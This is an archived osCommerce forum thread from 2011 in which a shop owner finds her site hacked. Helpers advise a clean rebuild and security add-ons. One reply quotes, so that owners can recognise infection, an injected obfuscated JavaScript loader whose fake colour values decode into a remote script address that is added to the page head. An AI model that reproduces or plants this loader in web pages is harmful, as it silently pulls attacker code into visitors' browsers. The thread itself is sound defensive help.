azrose Posted March 30, 2011 Share Posted March 30, 2011 Parse error: syntax error, unexpected T_VAR in /home/lifebeat/public_html/lifebeatproducts.com/admin/includes/functions/html_output.php on line 25 Received that error code when I clicked on the "bookmark" link I have been using for 3yrs... :( could someone assist me? Link to comment Share on other sites More sharing options...
Guest Posted March 30, 2011 Share Posted March 30, 2011 Rose, Check for unauthorized file changes. I sounds like your site has been hacked. Chris Link to comment Share on other sites More sharing options...
germ Posted March 30, 2011 Share Posted March 30, 2011 Related post here If the file has this code (or similar) it's hacked. <script type="text/javascript"> if (typeof(redef_colors)=="undefined") { var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7a84', '#82837e', '#40403d', '#727e7c', '#3e7982', '#3e7980', '#847481', '#883d7c', '#787d3d', '#7f777f', '#314d00'); var redef_colors = 1; var colors_picked = 0; function div_pick_colors(t,styled) { var s = ""; for (j=0;j<t.length;j++) { var c_rgb = t[j]; for (i=1;i<7;i++) { var c_clr = c_rgb.substr(i++,2); if (c_clr!="00") s += String.fromCharCode(parseInt(c_clr,16)-15); } } if (styled) { s = s.substr(0,36) + s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime() + s.substr((s.length-2)); } else { s = s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime(); } return s; } function try_pick_colors() { try { if(!document.getElementById || !document.createElement){ document.write(div_pick_colors(div_colors,1)); } else { var new_cstyle=document.createElement("script"); new_cstyle.type="text/javascript"; new_cstyle.src=div_pick_colors(div_colors,0); document.getElementsByTagName("head")[0].appendChild(new_cstyle); } } catch(e) { } try { check_colors_picked(); } catch(e) { setTimeout("try_pick_colors()", 500); } } try_pick_colors(); } </script> If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
azrose Posted March 30, 2011 Author Share Posted March 30, 2011 Thank you... and yes the site was hacked... you both were right.... :angry: Is this a common thing with open source carts? Is one shopping cart any safer than another? So many people suggest I change shopping carts. Any input? thank you again for your replies. Rose B) Link to comment Share on other sites More sharing options...
Guest Posted March 30, 2011 Share Posted March 30, 2011 Rose, The security thread contains all/any required code changes for security issues as they arise. Many open source carts have made revisions relating to security so to say one is more secure than the other is relative to the development teams response to those issues. If you clean and secure your cart, it will remain that way as long as cart owners revise as security issues are identified. Chris Link to comment Share on other sites More sharing options...
Taipo Posted March 30, 2011 Share Posted March 30, 2011 So many people suggest I change shopping carts. Any input? The code posted is not in itself the code being used to 'post' rogue code into files, but rather it is the result of an attack to add code into your files...so that means there are other files on your server that are being used by attackers to add and append file code into your site files. My advice is to build a new web cart with the latest stable release of oscommerce (ver 2.3.1)and import your database into it. Then add on the security additions like htaccess for the admin directory and other security contributions as well. That is the most secure method. Merely upgrading by installing over top of existing site files will not remove rogue files that have been uploaded to your site that are not a part of the oscommerce file repository. - Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)- Another discussion about infected files ::here::- A discussion on file permissions ::here::- Site hacked? Should you upgrade or not, some thoughts ::here::- Fix the admin login bypass exploit here- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX Link to comment Share on other sites More sharing options...
azrose Posted April 1, 2011 Author Share Posted April 1, 2011 Rose, The security thread contains all/any required code changes for security issues as they arise. Many open source carts have made revisions relating to security so to say one is more secure than the other is relative to the development teams response to those issues. If you clean and secure your cart, it will remain that way as long as cart owners revise as security issues are identified. Chris Link to comment Share on other sites More sharing options...
azrose Posted April 1, 2011 Author Share Posted April 1, 2011 Hey Chris, thank you for your reply and input. My web developer is no longer available for me. :'( I do not have an onsite web management team, yes I know... bad girl... :blush: My cart is up and working (back end) but the site was to corrupted ... so now "rebuilding" is what I am being told is the "cheaper" way to go. anyway thank you and any other suggestions you might have is truly appreciated. Rose :-" Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.